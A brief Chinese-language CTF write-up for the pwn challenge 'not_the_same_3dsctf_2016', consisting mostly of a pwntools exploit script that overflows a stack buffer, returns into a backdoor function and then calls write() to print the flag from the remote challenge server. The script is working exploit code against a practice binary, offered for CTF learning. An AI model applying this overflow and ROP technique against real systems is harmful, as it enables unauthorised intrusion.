not_the_same_3dsctf_2016

栈溢出ret2text rop

main

存在后门：

将文件写进bss段的全局变量

控制一下执行流程ret2write然后输出这个变量就行了
exp:

from pwn import *
import time 

context.log_level = 'debug'

sh = remote('node4.buuoj.cn', 26446)

p_backdoor = 0x080489A0

p_fprintf = 0x08085950
p_write = 0x0806E270

p_exit = 0x0804E660

p_flag = 0x080ECA2D
# sh.recv()


payload = 0x2d * b'm' + p32(p_backdoor) + p32(p_write) + p32(p_exit)
payload += p32(1) + p32(p_flag) + p32(45)

sh.sendline(payload)

sh.interactive()

sh.close()